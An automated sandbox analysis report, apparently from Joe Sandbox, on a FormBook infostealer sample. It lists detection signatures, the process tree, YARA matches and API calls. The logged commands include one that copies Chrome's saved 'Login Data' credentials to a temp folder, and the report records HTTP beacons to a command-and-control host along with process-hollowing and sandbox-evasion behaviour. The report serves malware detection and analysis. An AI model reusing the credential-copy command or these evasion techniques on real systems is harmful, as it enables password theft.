
Analysis Report Confirm!!!.exe

Overview

General Information

Sample Name: Confirm!!!.exe
Analysis ID: 299313
MD5: a97e07fb4bf0fdc53cb010c14cfd4427
SHA1: a55756426c68efff0f4b68db7d03e79eb4c5f2ba
SHA256: 231c67754beaf04b57ae055b9487d8148e0c7454d98ee0e2be8b13f367ff3a40
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Confirm!!!.exe (PID: 6812 cmdline: 'C:\Users\user\Desktop\Confirm!!!.exe' MD5: A97E07FB4BF0FDC53CB010C14CFD4427)
    • Confirm!!!.exe (PID: 6932 cmdline: {path} MD5: A97E07FB4BF0FDC53CB010C14CFD4427)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6796 cmdline: /c del 'C:\Users\user\Desktop\Confirm!!!.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6544 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ms9r74an.exe (PID: 1004 cmdline: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe MD5: CFF235DAF3853E3DC31590A1EB01E27A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.Confirm!!!.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.Confirm!!!.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.2.Confirm!!!.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.2.Confirm!!!.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.Confirm!!!.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
• 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1408, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, ProcessId: 6544

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Confirm!!!.exe | Virustotal: Detection: 25%
Source: Confirm!!!.exe | ReversingLabs: Detection: 37%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Confirm!!!.exe | Joe Sandbox ML: detected
Source: 2.2.Confirm!!!.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008931DC FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: global traffic | HTTP traffic detected: GET /3iw/?wh=fVcxXbr1VFY0vJdP1J5nZP1yS3y9jR0OedObz6l5iNpCsakFdBfixoBrK4YuJJNL1pgQZhjOhQ==&DR=ypFHslT HTTP/1.1 | Host: www.safariflorist.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: PLI-ASCH PLI-ASCH
Source: unknown | DNS traffic detected: queries for: www.safariflorist.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmd.exe | Dropped file: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.ini
Source: C:\Windows\SysWOW64\cmd.exe | Dropped file: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00419830 NtCreateFile
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_004198E0 NtReadFile
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00419960 NtClose
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00419A10 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041982D NtCreateFile
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_004198DA NtReadFile
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00419883 NtReadFile
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041995A NtClose
Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00419A0B NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008758A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008784BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087B4C0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087B4F8 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087B42E NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00896D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0089B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00899AB4 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008783F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069B00 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069770 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030696D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069560 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030699A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030695D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0306A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03069760 NtOpenProcess
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0306A770 NtOpenThread
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030697A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306A3B0 NtGetContextThread,8_2_0306A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A00 NtProtectVirtualMemory,8_2_03069A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069610 NtEnumerateValueKey,8_2_03069610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A10 NtQuerySection,8_2_03069A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A20 NtResumeThread,8_2_03069A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069650 NtQueryValueKey,8_2_03069650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069660 NtAllocateVirtualMemory,8_2_03069660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069670 NtQueryInformationProcess,8_2_03069670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069A80 NtOpenDirectoryObject,8_2_03069A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069520 NtWaitForSingleObject,8_2_03069520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306AD30 NtSetContextThread,8_2_0306AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069950 NtQueueApcThread,8_2_03069950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030699D0 NtCreateProcessEx,8_2_030699D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030695F0 NtQueryInformationFile,8_2_030695F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_03069820 NtEnumerateKey,8_2_03069820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0306B040 NtSuspendThread,8_2_0306B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030698A0 NtWriteVirtualMemory,8_2_030698A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_030698F0 NtReadVirtualMemory,8_2_030698F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_00886550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,8_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0088374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,8_2_0088374E
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 0_2_02D6C21C 0_2_02D6C21C
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 0_2_02D6EBF8 0_2_02D6EBF8
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 0_2_02D6EBE9 0_2_02D6EBE9
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00401030 2_2_00401030
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041D9F9 2_2_0041D9F9
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041C981 2_2_0041C981
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041DA6F 2_2_0041DA6F
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041CAB7 2_2_0041CAB7
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041DB43 2_2_0041DB43
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041DDC9 2_2_0041DDC9
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00402D90 2_2_00402D90
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041D5AD 2_2_0041D5AD
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00409F5E 2_2_00409F5E
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00409F60 2_2_00409F60
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_0041CFCE 2_2_0041CFCE
          Source: C:\Users\user\Desktop\Confirm!!!.exe | Code function: 2_2_00402FB0 2_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008748E6 8_2_008748E6
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00895CEA 8_2_00895CEA
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00879CF0 8_2_00879CF0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087D803 8_2_0087D803
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087E040 8_2_0087E040
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00877190 8_2_00877190
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_008931DC 8_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00893506 8_2_00893506
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00886550 8_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00881969 8_2_00881969
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00878AD7 8_2_00878AD7
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00875226 8_2_00875226
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087FA30 8_2_0087FA30
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00875E70 8_2_00875E70
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00885FC8 8_2_00885FC8
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_00896FF0 8_2_00896FF0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0087CB48 8_2_0087CB48
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0305EBB0 8_2_0305EBB0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03046E30 8_2_03046E30
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0302F900 8_2_0302F900
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03020D20 8_2_03020D20
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_03044120 8_2_03044120
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030F1D55 8_2_030F1D55
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_030E1002 8_2_030E1002
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0303841F 8_2_0303841F
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_0303B090 8_2_0303B090
          Source: ms9r74an.exe.3.dr | Static PE information: Resource name: RT_VERSION type: AKT archive data
          Source: Confirm!!!.exe, 00000000.00000000.238223791.0000000000B40000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000000.00000002.254392668.0000000006030000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000000.246642206.0000000000A90000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000002.288732684.000000000177F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Confirm!!!.exe
          Source: Confirm!!!.exe, 00000002.00000002.288963096.000000000196D000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs Confirm!!!.exe
          Source: Confirm!!!.exe | Binary or memory string: OriginalFilename3 vs Confirm!!!.exe
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
